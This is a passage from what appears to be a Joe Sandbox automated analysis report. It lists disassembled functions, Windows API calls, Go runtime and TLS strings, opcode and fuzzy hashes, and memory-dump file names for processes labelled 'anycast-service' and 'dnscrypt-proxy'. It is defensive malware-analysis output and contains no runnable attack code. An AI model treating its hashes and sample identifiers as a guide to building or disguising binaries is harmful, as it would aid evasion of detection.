                                                                                                                              • API ID: abort$CreateFrameInfo
                                                                                                                              • String ID: csm
                                                                                                                              • API String ID: 2697087660-1018135373
                                                                                                                              • Opcode ID: 176489b15a8e5675c63634e8f088605c593f2777d3404a615244bb18e54b1216
                                                                                                                              • Instruction ID: 544d0aecc6b6c32908f092a661f7690df3ba0470ab7809c6671586ae941b4255
                                                                                                                              • Opcode Fuzzy Hash: 176489b15a8e5675c63634e8f088605c593f2777d3404a615244bb18e54b1216
                                                                                                                              • Instruction Fuzzy Hash: 545138B2A19742C6E720AB19E44466E77B4FB88BD6F100134EB8D47B56DF3CE462CB04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B802E394 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                              • String ID: U
                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                              • Opcode ID: dcc647aa74a0f493f639bdd00f8a0e7a687e6f712385d0ef6133f3eebc6bc418
                                                                                                                              • Instruction ID: 5002f6fffca5a2f3e5939b2786248a68188ce7aa32fb3c9547f2ddfa8c3559b4
                                                                                                                              • Opcode Fuzzy Hash: dcc647aa74a0f493f639bdd00f8a0e7a687e6f712385d0ef6133f3eebc6bc418
                                                                                                                              • Instruction Fuzzy Hash: FC41BE23A19A8582EB608F29E8443AA67A1FB987D4F904032EF4D87799DF7CD443C744
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F896A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+
                                                                                                                              • String ID: void$void
                                                                                                                              • API String ID: 2943138195-3746155364
                                                                                                                              • Opcode ID: a140820a80588b67cdbf7696c8cc2e033ae27a746cb445f0da5a3dfe765a646e
                                                                                                                              • Instruction ID: 86be3412932d58bfed028ea958f97f4172fae0f5fe1f6f11e57494561b82384b
                                                                                                                              • Opcode Fuzzy Hash: a140820a80588b67cdbf7696c8cc2e033ae27a746cb445f0da5a3dfe765a646e
                                                                                                                              • Instruction Fuzzy Hash: 62310472F18A2599EB118BA8E8414EC37B0FB48789F440136DB4E66B5AEF3C91468758
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B802A2C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Stringtry_get_function
                                                                                                                              • String ID: LCMapStringEx
                                                                                                                              • API String ID: 2588686239-3893581201
                                                                                                                              • Opcode ID: c662c89f807c33626bd9e3a161b01280c3b869cc250fd952fb0fcb2f3bcc2bcf
                                                                                                                              • Instruction ID: 6842f4c8d92a6917bf7fe134fc70e67a0dd8bb81ff632833ad33c201fd7e89e8
                                                                                                                              • Opcode Fuzzy Hash: c662c89f807c33626bd9e3a161b01280c3b869cc250fd952fb0fcb2f3bcc2bcf
                                                                                                                              • Instruction Fuzzy Hash: 2711FC36608B8186DB608F5AB4402AAB7A5F7CDBC0F544136EF8D43B59DF3CD4568B04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F85DAF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileHeader$ExceptionRaise
                                                                                                                              • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                                                              • API String ID: 3685223789-3176238549
                                                                                                                              • Opcode ID: 08bd3c53b7443716fdb69dcad0e479fe658e0a257721bfc9cb1d753e32da87d6
                                                                                                                              • Instruction ID: 726800b6c9c0e43da449cdbadabd24a6208af9bc8f24e5552bccdb25ef0252e5
                                                                                                                              • Opcode Fuzzy Hash: 08bd3c53b7443716fdb69dcad0e479fe658e0a257721bfc9cb1d753e32da87d6
                                                                                                                              • Instruction Fuzzy Hash: 7E012171A29A46D3EF409B58E8419B86360FF94BC6F845031E74E0676AEF6CD516C704
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80180F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8B80122AF), ref: 00007FF8B801813C
                                                                                                                              • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8B80122AF), ref: 00007FF8B8018182
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                              • String ID: csm
                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                              • Opcode ID: 13a0adb6103eaeec934d34b6680b89f3e5536a11fcc3037e25efdb4b24193f4b
                                                                                                                              • Instruction ID: e0b111566626451bdbbb5756c4abe246d5245b68f5d753b2dc2ff16257527b33
                                                                                                                              • Opcode Fuzzy Hash: 13a0adb6103eaeec934d34b6680b89f3e5536a11fcc3037e25efdb4b24193f4b
                                                                                                                              • Instruction Fuzzy Hash: EC113D32618B8182EF508B19F44026AB7A5FB88BD4F184230EF8D077A4DF3CD5538B04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F86150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                              • String ID: csm
                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                              • Opcode ID: c0aba1fcbfdd568d6ff87e16579d2a8b7ada7522ee49cfe03f08dfeb25c6ccd7
                                                                                                                              • Instruction ID: 32956ae73b2e01be95b8ac3734bbb629b750bc35fd824557974e460d1c27d0d9
                                                                                                                              • Opcode Fuzzy Hash: c0aba1fcbfdd568d6ff87e16579d2a8b7ada7522ee49cfe03f08dfeb25c6ccd7
                                                                                                                              • Instruction Fuzzy Hash: A9114C32A08B4182EB608F59F94466977A0FB88FC5F184231DF8C0776ADF3DD5528B04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B802A25C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                                                              • API String ID: 539475747-3084827643
                                                                                                                              • Opcode ID: 7efc167d8b4747e23085bc8a3f99eae83c9b9b65ca4aaa6abf6fd5756134f854
                                                                                                                              • Instruction ID: 4c7528ac94a2f527ae728c4120314f74913c94fad6196d299ffe3060efc0a5cb
                                                                                                                              • Opcode Fuzzy Hash: 7efc167d8b4747e23085bc8a3f99eae83c9b9b65ca4aaa6abf6fd5756134f854
                                                                                                                              • Instruction Fuzzy Hash: DEF05E21A1874281EF058B5BB4404A97221EF8CBC0F445435EB4D03B95CF7CD85BC708
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B802A208 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF8B802A231
                                                                                                                              • TlsSetValue.KERNEL32(?,?,?,00007FF8B802696E,?,?,?,00007FF8B801E191,?,?,?,?,00007FF8B8025CA1), ref: 00007FF8B802A248
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Valuetry_get_function
                                                                                                                              • String ID: FlsSetValue
                                                                                                                              • API String ID: 738293619-3750699315
                                                                                                                              • Opcode ID: 6dda3b476730bcac1ed5998632b08b93696e84707eb0a92f9755d54b97d98510
                                                                                                                              • Instruction ID: 30667f332ac6acdd06b16ef0f3bb11d354c19ad68e6c84e08ec9890433ff4d38
                                                                                                                              • Opcode Fuzzy Hash: 6dda3b476730bcac1ed5998632b08b93696e84707eb0a92f9755d54b97d98510
                                                                                                                              • Instruction Fuzzy Hash: 43E0ED71A5864291FF055B6EE8414B92222AF4C7C0F585136EB5D066E5CF7CE89BC708
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8648C Relevance: 5.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF8B8F86319,?,?,?,?,00007FF8B8F8EE02,?,?,?,?,?), ref: 00007FF8B8F864AB
                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF8B8F86319,?,?,?,?,00007FF8B8F8EE02,?,?,?,?,?), ref: 00007FF8B8F86534
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1452528299-0
                                                                                                                              • Opcode ID: 31b473eadf82003da05d1ce517f46791b2690bf342829a909b2ef4dcb468480c
                                                                                                                              • Instruction ID: 575edfaa439f001239cbd82867df96e8fb9d15e1e0c20f172add8dc5d4192d68
                                                                                                                              • Opcode Fuzzy Hash: 31b473eadf82003da05d1ce517f46791b2690bf342829a909b2ef4dcb468480c
                                                                                                                              • Instruction Fuzzy Hash: 79114531E19642C2FB54976DF90853922516F54BE2F184634DB6E073EADF2CF453CA08
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8013E20 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHeapLast$AllocProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4104531043-0
                                                                                                                              • Opcode ID: e67b2419d65690588f29ae38b1cf14159038151b3c985b1bc5e852661946ae8b
                                                                                                                              • Instruction ID: 05512fa043a835531b51ccb04cdd2d0b40f461e5d4f1d97438b8786b61c0ebdf
                                                                                                                              • Opcode Fuzzy Hash: e67b2419d65690588f29ae38b1cf14159038151b3c985b1bc5e852661946ae8b
                                                                                                                              • Instruction Fuzzy Hash: AFE06D25704B8686DF445B6AE5840292260BF4CBC8F044435EF0E02798EF7CE88A8604
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 009921E0 Relevance: 11.4, Strings: 9, Instructions: 172COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolbad scalar length: %d, expected %dchacha20: wrong HChaCha20 key sizeconnection doesn't support Ed25519crypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00992445
                                                                                                                              • %, xrefs: 00992504
                                                                                                                              • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstream %d canceled with error code %dstrings: Repeat count causes overflows, xrefs: 009924FB
                                                                                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00992411
                                                                                                                              • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontls: failed to find any PEM data in key inputtls: internal error: failed to update binderstls: internal error: unexpected ren, xrefs: 0099246C
                                                                                                                              • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontls: failed to find any PEM data in key inputtls: internal error: failed to upda, xrefs: 009924C7
                                                                                                                              • CreateWaitableTimerEx when creating timer failedResolving [%s] using bootstrap resolvers over %sStamp error for the static [%s] definition: [%v]Time.MarshalJSON: year outside of range [0,9999]Time.MarshalText: year outside of range [0,9999]Tracking %d connecti, xrefs: 009924A0
                                                                                                                              • bad g0 stackbad rdlengthbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOd.f.ip6.arpadata_on_idledearmyrouterdumping heapdup_trailersempty packetend tracegcentersyscallf.f.ip6.arpagcBitsAr, xrefs: 009923EA
                                                                                                                              • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtime: unknown unit timing-allow-origintoo many open filesunexpected '""""""'unexpected "''''''"unexpected g , xrefs: 0099237B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000027.00000002.2170068325.0000000000961000.00000020.00000001.01000000.00000011.sdmp, Offset: 00960000, based on PE: true
                                                                                                                              • Associated: 00000027.00000002.2170055257.0000000000960000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170356227.0000000000D62000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170583304.00000000010F9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170600016.0000000001101000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170612828.0000000001102000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170625966.0000000001103000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170650805.0000000001139000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170667856.000000000113B000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170682986.000000000113D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170698304.000000000113F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170711682.0000000001140000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170711682.000000000114A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170711682.000000000114E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170711682.000000000116A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170711682.000000000116F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170782110.000000000117A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170794560.000000000117B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_39_2_960000_dnscrypt-proxy.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: %$CreateWaitableTimerEx when creating timer failedResolving [%s] using bootstrap resolvers over %sStamp error for the static [%s] definition: [%v]Time.MarshalJSON: year outside of range [0,9999]Time.MarshalText: year outside of range [0,9999]Tracking %d connecti$VirtualQuery for stack base failedadding nil Certificate to CertPoolbad scalar length: %d, expected %dchacha20: wrong HChaCha20 key sizeconnection doesn't support Ed25519crypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu$bad g0 stackbad rdlengthbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOd.f.ip6.arpadata_on_idledearmyrouterdumping heapdup_trailersempty packetend tracegcentersyscallf.f.ip6.arpagcBitsAr$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontls: failed to find any PEM data in key inputtls: internal error: failed to upda$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstream %d canceled with error code %dstrings: Repeat count causes overflows$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontls: failed to find any PEM data in key inputtls: internal error: failed to update binderstls: internal error: unexpected ren$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtime: unknown unit timing-allow-origintoo many open filesunexpected '""""""'unexpected "''''''"unexpected g
                                                                                                                              • API String ID: 0-952561003
                                                                                                                              • Opcode ID: 1f877041f9d226303a19ffc6c038bdb65918573bfc3b3445809be0650eccb83b
                                                                                                                              • Instruction ID: 857203401fed46afe9a994a244e13022f30956aa7539a8db2677c0ba11cce06d
                                                                                                                              • Opcode Fuzzy Hash: 1f877041f9d226303a19ffc6c038bdb65918573bfc3b3445809be0650eccb83b
                                                                                                                              • Instruction Fuzzy Hash: 6C8101B45097019FDB00EFA8C185B5ABBE4BF88748F01892CF48897352EB79D948CF52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 009A1A70 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • m->p= max= min= next= p->m= prev= span=% util%.0fm %.2fm %0.16X%0.16x%s: %s(...), i = , id: , not , val .onion0.%02d0x%04X390625<-chan</a>.ACPKIXAcceptAnswerArabicAugustBADALGBADKEYBADSIGBasic BrahmiCANCELCarianChakmaClientClosedCommonCookieCopticDAEMONDE, xrefs: 009A1B2B
                                                                                                                              • p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=;; opcode: AUTHORITY: BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestCERTIFI, xrefs: 009A1B77
                                                                                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontoml: (l, xrefs: 009A1BC1
                                                                                                                              • releasep: m=remote errorruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinestatic relaysweepWaiterstls10defaulttraceStringstransmitfileunknown portwintrust.dllwirep: p->m=worker mode wtsapi32.dllzghjccbob3n0 != swee, xrefs: 009A1B09
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000027.00000002.2170068325.0000000000961000.00000020.00000001.01000000.00000011.sdmp, Offset: 00960000, based on PE: true
                                                                                                                              • Associated: 00000027.00000002.2170055257.0000000000960000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170356227.0000000000D62000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170583304.00000000010F9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170600016.0000000001101000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170612828.0000000001102000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170625966.0000000001103000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170650805.0000000001139000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170667856.000000000113B000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                              • Associated: 00000027.00000002.2170682986.000000000113D000.00000004.00000001.01000000.00000011.sdmpDownload File
